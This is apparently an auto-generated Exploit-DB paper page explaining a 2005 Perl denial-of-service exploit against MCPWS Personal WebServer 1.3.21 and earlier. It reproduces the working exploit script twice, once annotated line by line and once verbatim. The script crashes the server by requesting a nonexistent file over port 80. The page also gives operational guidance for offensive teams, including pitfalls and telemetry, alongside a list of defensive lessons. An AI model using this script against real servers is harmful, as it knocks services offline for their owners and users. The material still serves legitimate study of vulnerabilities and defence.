By exploitdb papers bot•March 21, 2005•
papers
Exploiting MCPWS Personal WebServer 1.3.21: A Denial of Service Deep Dive
Exploiting MCPWS Personal WebServer 1.3.21: A Denial of Service Deep Dive
What this paper is
This paper details a Denial of Service (DoS) vulnerability in MCPWS Personal WebServer version 1.3.21 and earlier. The vulnerability arises from the web server's insecure handling of file requests, specifically when attempting to open non-existent files. The exploit, written in Perl, leverages this by sending a request for a file that is guaranteed not to exist, causing the web server process to crash.
Simple technical breakdown
The core of the vulnerability lies in how the MCPWS web server handles requests for files. When a user requests a file, the server uses a VB-function called "Open" to retrieve it. However, this function lacks proper error handling. If the requested file doesn't exist, instead of gracefully informing the user or logging the error, the server encounters a runtime error. This unhandled error causes the entire web server process to terminate, effectively denying service to all users. The exploit simply sends a request for a deliberately non-existent file to trigger this crash.
Complete code and payload walkthrough
The provided Perl script is designed to exploit the DoS vulnerability in MCPWS Personal WebServer 1.3.21. Let's break down the code:
#!/usr/bin/perl
# MCPWS Personal - Webserver <= 1.3.21 DoS Exploit
# Vendor: http://www.mcpsoftware.de
#
# The coder used a unsecure VB-function (Open) to open requested files
# and didn't include a working error handling (On Error Goto etc).
# It's possible to exploit this vulnerability by requesting files
# that don't exist. Successful exploitation results
# in a runtime error that stops the process.
#
# Nico Spicher [http://triplex.it-helpnet.de/]
use IO::Socket; # Imports the necessary module for network socket operations.
if (@ARGV < 1) # Checks if there is at least one command-line argument.
{
system "clear"; # Clears the terminal screen.
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n"; # Prints the exploit title.
print "[-] Usage: dos_mcpws.pl <host ip>\n"; # Prints the correct usage instructions.
exit(1); # Exits the script with an error code.
}
system "clear"; # Clears the terminal screen again.
$server = $ARGV[0]; # Assigns the first command-line argument (the target IP address) to the $server variable.
system "clear"; # Clears the terminal screen.
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n"; # Prints the exploit title.
print "[-] Server IP: "; # Prints a label for the server IP.
print $server; # Prints the target server IP.
print "\n[-] Connecting to IP ...\n"; # Informs the user that the script is attempting to connect.
$socket = IO::Socket::INET->new( # Creates a new TCP socket for an IPv4 connection.
Proto => "tcp", # Specifies the protocol as TCP.
PeerAddr => "$server", # Sets the remote IP address to the target server.
PeerPort => "80"); # Sets the remote port to 80, the default HTTP port.
unless ($socket) { die "[-] $server is offline\n" } # If the socket creation fails (connection refused or server is down), it prints an error and exits.
print "[-] Connected\n\n"; # Informs the user that the connection was successful.
print "[-] Creating string\n"; # Informs the user that a string is being prepared.
$string="ABCDEFGHIJKLMNOPQRSTUVWXYZ"; # Defines a string containing uppercase letters. This string is intended to represent a filename that will not exist on the server.
# This file shouldn't exist :) # A comment indicating the purpose of the string.
print "[-] Sending string\n\n"; # Informs the user that the malicious request is about to be sent.
print $socket "GET /".$string." HTTP/1.1\r\n\r\n"; # This is the core of the exploit. It sends an HTTP GET request to the server.
# - "GET /" : Initiates an HTTP GET request for a resource.
# - $string : Appends the non-existent filename ("ABCDEFGHIJKLMNOPQRSTUVWXYZ").
# - " HTTP/1.1\r\n\r\n" : Specifies the HTTP protocol version and ends the request headers. The double \r\n signifies the end of the HTTP headers.
print "[>] Attack successful - Server killed\n"; # Assumes the attack was successful and prints a confirmation message.
close($socket); # Closes the network socket connection.
# milw0rm.com [2005-03-21] # A reference to the source of the exploit.
Code Fragment/Block -> Practical Purpose Mapping:
#!/usr/bin/perl: Shebang line, indicating the script should be executed with Perl.use IO::Socket;: Imports the Perl module for network socket programming.if (@ARGV < 1) { ... }: Command-line argument validation. Ensures the target IP is provided.system "clear";: Clears the terminal for a cleaner output.print "[-] ...";: Prints informational messages to the console.$server = $ARGV[0];: Captures the target IP address from the command line.IO::Socket::INET->new(...): Establishes a TCP connection to the target IP on port 80.unless ($socket) { die ... }: Error handling for connection failure.$string="ABCDEFGHIJKLMNOPQRSTUVWXYZ";: Defines the payload string, representing a non-existent file.print $socket "GET /".$string." HTTP/1.1\r\n\r\n";: Sends the crafted HTTP GET request to trigger the vulnerability.print "[>] Attack successful - Server killed\n";: Post-exploit confirmation message.close($socket);: Closes the network connection.
Shellcode/Payload Segments:
This exploit does not contain traditional shellcode in the form of executable bytes. The "payload" is the crafted HTTP GET request itself:
- Payload:
GET /ABCDEFGHIJKLMNOPQRSTUVWXYZ HTTP/1.1\r\n\r\n - Stage 1 (Request Construction): The Perl script constructs a standard HTTP GET request.
- Stage 2 (Targeting Non-existent Resource): The key element is the
/ABCDEFGHIJKLMNOPQRSTUVWXYZpart. This is a deliberately long and unlikely filename. The vulnerability lies in the server'sOpenfunction not handling the absence of this file gracefully. - Stage 3 (Triggering Runtime Error): When the MCPWS server attempts to open
/ABCDEFGHIJKLMNOPQRSTUVWXYZ, it fails. Due to the lack of error handling (specifically, something likeOn Error Gotoin VB), this failure results in an unhandled runtime exception. - Stage 4 (Process Termination): The unhandled runtime exception causes the MCPWS web server process to crash and terminate, thus achieving the Denial of Service.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the target system. The exploit targets a network service accessible from the outside.
- Lab Preconditions:
- A vulnerable MCPWS Personal WebServer 1.3.21 (or earlier) instance must be running and accessible on the network.
- The target server must be listening on port 80 (or the configured HTTP port if changed).
- Network connectivity from the attacker's machine to the target server's port 80.
- Tooling Assumptions:
- Perl interpreter installed on the attacker's machine.
- Basic network utilities (like
pingortelnet) for initial reconnaissance.
- Execution Pitfalls:
- Incorrect Version: The exploit will likely not work against versions of MCPWS later than 1.3.21, as the vulnerability may have been patched.
- Firewall Blocking: Network firewalls might block traffic to port 80, preventing the exploit from reaching the server.
- Server Configuration: If the web server is configured to listen on a different port, the script will need modification.
- Load Balancers/WAFs: Modern security devices like Web Application Firewalls (WAFs) or load balancers might detect and block the unusual GET request, or the underlying server might be protected by a more robust system.
- Service Restart: The MCPWS server might be configured to automatically restart after a crash. This would limit the duration of the DoS.
- Telemetry:
- Network: Outbound TCP connection to port 80 on the target IP. An HTTP GET request is sent. No significant response is expected if the server crashes.
- Host (Target): Process termination of the MCPWS web server executable. Event logs might record an application crash. No successful connection or file access logs related to the exploit request.
- Host (Attacker): Successful execution of the Perl script. Network connection established and data sent.
Where this was used and when
- Context: This vulnerability was relevant in the early to mid-2000s, a period when web server security practices were less mature. Exploits like this were common for demonstrating weaknesses in widely deployed, albeit often niche, web server software.
- Approximate Years/Dates: The exploit was published on March 21, 2005. Therefore, its active exploitation window would have been around this period and likely a few years prior, as vulnerabilities are often discovered and weaponized before public disclosure.
Defensive lessons for modern teams
- Robust Error Handling: Applications, especially network-facing services, must implement comprehensive error handling. Unhandled exceptions are a primary vector for DoS attacks.
- Input Validation: Always validate user-supplied input, including requested filenames and paths. Ensure that requests only target legitimate, expected resources.
- Secure File Access: When accessing files, use secure APIs and always check for the existence of files before attempting to open them. Implement checks for path traversal or other malicious file access attempts.
- Regular Patching: Keep all software, including web servers and their underlying components, updated with the latest security patches.
- Intrusion Detection/Prevention Systems (IDPS): Deploy and configure IDPS to detect and block malformed or suspicious HTTP requests.
- Web Application Firewalls (WAFs): Use WAFs to filter out common web attack patterns, including requests for non-existent or sensitive files.
- Service Monitoring and Restart: Implement robust monitoring for critical services. Configure automatic restart mechanisms for web servers to minimize downtime in case of unexpected crashes.
ASCII visual (if applicable)
This exploit is a simple client-server interaction, so a complex architecture diagram isn't strictly necessary. However, a basic flow can be visualized:
+-----------------+ TCP Port 80 +-----------------------+
| Attacker Machine| ----------------------> | MCPWS Personal Web |
| (Perl Script) | | Server (Vulnerable) |
+-----------------+ +-----------------------+
| |
| 1. Send GET /nonexistent_file HTTP/1.1 | 2. Server attempts to open file
| |
|-------------------------------------------->| 3. File not found -> Unhandled Runtime Error
| |
| | 4. Server Process Crashes (DoS)
| |
| |
| 5. Attacker sees "Attack successful" |
|<--------------------------------------------| (No meaningful response)Source references
- PAPER ID: 891
- PAPER TITLE: MCPWS Personal WebServer 1.3.21 - Denial of Service
- AUTHOR: Nico Spicher
- PUBLISHED: 2005-03-21
- PAPER URL: https://www.exploit-db.com/papers/891
- RAW URL: https://www.exploit-db.com/raw/891
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
# MCPWS Personal - Webserver <= 1.3.21 DoS Exploit
# Vendor: http://www.mcpsoftware.de
#
# The coder used a unsecure VB-function (Open) to open requested files
# and didn't include a working error handling (On Error Goto etc).
# It's possible to exploit this vulnerability by requesting files
# that don't exist. Successful exploitation results
# in a runtime error that stops the process.
#
# Nico Spicher [http://triplex.it-helpnet.de/]
use IO::Socket;
if (@ARGV < 1)
{
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Usage: dos_mcpws.pl <host ip>\n";
exit(1);
}
system "clear";
$server = $ARGV[0];
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Server IP: ";
print $server;
print "\n[-] Connecting to IP ...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket) { die "[-] $server is offline\n" }
print "[-] Connected\n\n";
print "[-] Creating string\n";
$string="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
# This file shouldn't exist :)
print "[-] Sending string\n\n";
print $socket "GET /".$string." HTTP/1.1\r\n\r\n";
print "[>] Attack successful - Server killed\n";
close($socket);
# milw0rm.com [2005-03-21]